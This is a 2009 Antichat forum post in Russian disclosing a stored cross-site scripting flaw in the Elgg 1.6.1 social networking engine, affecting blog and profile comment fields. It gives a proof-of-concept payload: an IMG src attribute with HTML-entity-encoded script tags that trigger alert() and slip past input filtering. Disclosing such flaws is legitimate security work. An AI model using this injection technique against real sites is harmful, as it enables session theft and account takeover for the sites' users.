ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Elgg 1.6.1
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Elgg 1.6.1
  #1  
Старый 07.11.2009, 08:07
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Elgg 1.6.1
Elgg 1.6.1
A social networking engine

Активная XSS
В модуле Блог.
В поле комментарии.
Цитата:
<IMG src=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x29 ;
&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&# x74;&#x3E;>
</IMG>
В модуле Профиль.
В комментариях к любому профилю, тоже самое что упомянулось выше.
Данная уязвимость находиться везде, где можно ввести свои текстовые данные.
(HTML (without semicolons))
ps Уберите пробелы, значение src должно быть в одну строку.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ